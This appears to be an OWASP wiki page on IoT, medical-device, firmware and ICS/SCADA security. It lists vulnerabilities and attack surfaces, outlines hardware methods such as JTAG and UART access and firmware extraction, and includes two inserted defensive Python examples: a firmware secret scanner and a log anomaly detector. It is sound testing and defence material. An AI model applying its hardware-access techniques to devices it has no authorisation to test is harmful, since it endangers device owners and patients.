<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies the availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
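As an added example (not project code, and not Firmwalker or any other tool listed above), a small Python scanner for three of the "Device Firmware Vulnerabilities" a file-system analysis should surface: private keys shipped in the image, hardcoded password hashes in passwd/shadow, and the same certificate reused across multiple firmware images. The two firmware images it scans are constructed in a temp directory; the file names under them are typical of embedded Linux but are assumptions, not taken from any specific product.<br />

```python
import hashlib
import tempfile
from collections import defaultdict
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

PRIVATE_KEY_MARKERS = (b"-----BEGIN RSA PRIVATE KEY-----", b"-----BEGIN EC PRIVATE KEY-----",
                       b"-----BEGIN PRIVATE KEY-----", b"-----BEGIN OPENSSH PRIVATE KEY-----")
CERT_MARKER = b"-----BEGIN CERTIFICATE-----"
CREDENTIAL_FILES = ("etc/passwd", "etc/shadow", "etc/passwd-", "etc/shadow-")
NO_PASSWORD = {"", "x", "*", "!", "!!", "*LK*"}   # placeholders in the hash field, not hashes
MAX_FILE_BYTES = 1 << 20                            # keys, certs and passwd files are small


def _small_files(root: Path) -> Iterator[Tuple[str, bytes]]:
    """Yield (relative POSIX path, content) for regular files under an extracted root."""
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file() or path.stat().st_size > MAX_FILE_BYTES:
            continue
        yield path.relative_to(root).as_posix(), path.read_bytes()


def scan_root(root: Path) -> List[Tuple[str, str]]:
    """Return sorted (finding, path) pairs for one extracted root filesystem."""
    findings = []
    for rel, data in _small_files(root):
        if any(marker in data for marker in PRIVATE_KEY_MARKERS):
            findings.append(("encryption key exposure: private key shipped in firmware", rel))
        if rel in CREDENTIAL_FILES:
            for line in data.decode("utf-8", errors="replace").splitlines():
                fields = line.split(":")
                if len(fields) >= 2 and fields[1] not in NO_PASSWORD:
                    findings.append((f"hardcoded credential: password hash for '{fields[0]}'", rel))
    return sorted(findings)


def duplicate_certs(images: Dict[str, Path]) -> List[Tuple[str, List[str]]]:
    """Certificates byte-identical in more than one image: (sha256, [image:path, ...])."""
    by_fp = defaultdict(list)
    for image, root in images.items():
        for rel, data in _small_files(root):
            if CERT_MARKER in data:
                by_fp[hashlib.sha256(data).hexdigest()].append(f"{image}:{rel}")
    return [(fp, sorted(where)) for fp, where in sorted(by_fp.items()) if len(where) > 1]


# Constructed sample: two fake extracted images; no real key, certificate or hash.
FAKE_CERT = b"-----BEGIN CERTIFICATE-----\nQ09OU1RSVUNURUQ=\n-----END CERTIFICATE-----\n"
FAKE_KEY = b"-----BEGIN RSA PRIVATE KEY-----\nQ09OU1RSVUNURUQ=\n-----END RSA PRIVATE KEY-----\n"
SAMPLE_IMAGES = {
    "camera_v1.0": {
        "etc/passwd": b"root:x:0:0:root:/:/bin/sh\nnobody:x:99:99::/:/bin/false\n",
        "etc/shadow": b"root:$1$cnstrctd$notARealHashXXXXXXXXXX:17000:0:99999:7:::\nnobody:*:17000::::::\n",
        "etc/dropbear/dropbear_rsa_host_key": FAKE_KEY,
        "etc/ssl/device.crt": FAKE_CERT,
    },
    "camera_v1.1": {
        "etc/passwd": b"root:x:0:0:root:/:/bin/sh\n",
        "etc/shadow": b"root:!:17500::::::\n",   # locked account: not a finding
        "etc/ssl/device.crt": FAKE_CERT,         # same cert as v1.0: a finding
    },
}


def build_sample_images() -> Dict[str, Path]:
    """Write SAMPLE_IMAGES to a temp directory and return image name -> root path."""
    base = Path(tempfile.mkdtemp(prefix="fw-scan-"))
    roots = {}
    for image, files in SAMPLE_IMAGES.items():
        root = base / image
        for rel, data in files.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_bytes(data)
        roots[image] = root
    return roots


if __name__ == "__main__":
    roots = build_sample_images()
    for image, root in roots.items():
        for finding, rel in scan_root(root):
            print(f"{image}: {finding} ({rel})")
    for fp, where in duplicate_certs(roots):
        print(f"certificate {fp[:16]}... reused in: {', '.join(where)}")
```

Point `scan_root` and `duplicate_certs` at directories produced by binwalk or the Firmware Modification Kit to run it on real extractions; certificate expiry and self-signing checks need an X.509 parser and are left out here.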
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
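As an added example (not part of the project), the following Python turns four of the events in the table above into detection logic run over a constructed device access log: unsupported HTTP method, multiple failed passwords, high rate of login attempts, and source location change during a session. The key=value log format, the thresholds and the supported-method set are assumptions for the example.<br />

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class Request:
    ts: float                 # seconds on a constructed clock
    src_ip: str
    user: str                 # "-" when no account is involved
    session: str              # "" when no session token was presented
    method: str
    path: str
    auth_ok: Optional[bool]   # True/False for login attempts, None otherwise


SUPPORTED_METHODS = {"GET", "POST"}   # what this hypothetical device's web UI accepts
FAILED_PASSWORD_THRESHOLD = 3          # consecutive failures for one account
RATE_THRESHOLD = 5                     # login attempts from one source ...
RATE_WINDOW_SECS = 10.0                # ... within this many seconds


def parse_line(line: str) -> Request:
    """Parse one constructed key=value log line into a Request."""
    kv = dict(tok.split("=", 1) for tok in line.split())
    auth = {"ok": True, "fail": False}.get(kv.get("auth", "-"))
    return Request(ts=float(kv["ts"]), src_ip=kv["src"], user=kv.get("user", "-"),
                   session="" if kv.get("sess", "-") == "-" else kv["sess"],
                   method=kv["method"], path=kv["path"], auth_ok=auth)


def detect_events(requests: Iterable[Request]) -> List[Tuple[str, str]]:
    """Return (event name, subject) pairs in the order they first trigger.

    Event names are those of the table above. Each (event, subject) pair is
    reported once, so a flood of attempts yields one alert rather than hundreds.
    """
    events: List[Tuple[str, str]] = []
    failures = defaultdict(int)      # user -> consecutive failed logins
    attempts = defaultdict(list)     # src_ip -> timestamps of recent login attempts
    session_ip = {}                  # session -> source IP first seen with it

    def emit(name: str, subject: str) -> None:
        if (name, subject) not in events:
            events.append((name, subject))

    for r in sorted(requests, key=lambda x: x.ts):
        # Request Exceptions: unsupported HTTP method
        if r.method not in SUPPORTED_METHODS:
            emit("Attempt to Invoke Unsupported HTTP Method", f"{r.src_ip} {r.method} {r.path}")
        # Session Exceptions: same session token presented from a different source
        if r.session and session_ip.setdefault(r.session, r.src_ip) != r.src_ip:
            emit("Source Location Changes During Session", r.session)
        if r.auth_ok is None:
            continue                 # not a login attempt
        # Authentication Exceptions: high rate of attempts from one source
        recent = [t for t in attempts[r.src_ip] if r.ts - t <= RATE_WINDOW_SECS]
        recent.append(r.ts)
        attempts[r.src_ip] = recent
        if len(recent) >= RATE_THRESHOLD:
            emit("High Rate of Login Attempts", r.src_ip)
        # Authentication Exceptions: multiple failed passwords for one account
        if r.auth_ok:
            failures[r.user] = 0
        else:
            failures[r.user] += 1
            if failures[r.user] >= FAILED_PASSWORD_THRESHOLD:
                emit("Multiple Failed Passwords", r.user)
    return events


# Constructed sample log; not captured from any real device.
SAMPLE_LOG = [
    "ts=0 src=10.0.0.5 user=admin sess=- method=POST path=/login auth=fail",
    "ts=1 src=10.0.0.5 user=admin sess=- method=POST path=/login auth=fail",
    "ts=2 src=10.0.0.5 user=admin sess=- method=POST path=/login auth=fail",
    "ts=3 src=10.0.0.5 user=admin sess=- method=POST path=/login auth=fail",
    "ts=4 src=10.0.0.5 user=root sess=- method=POST path=/login auth=fail",
    "ts=5 src=10.0.0.7 user=admin sess=s1 method=GET path=/status",
    "ts=6 src=203.0.113.9 user=admin sess=s1 method=GET path=/status",
    "ts=7 src=10.0.0.8 sess=- method=TRACE path=/config",
]


def run_sample() -> List[Tuple[str, str]]:
    """Run the detectors over SAMPLE_LOG."""
    return detect_events(parse_line(line) for line in SAMPLE_LOG)


if __name__ == "__main__":
    for name, subject in run_sample():
        print(f"{name}: {subject}")
```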
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
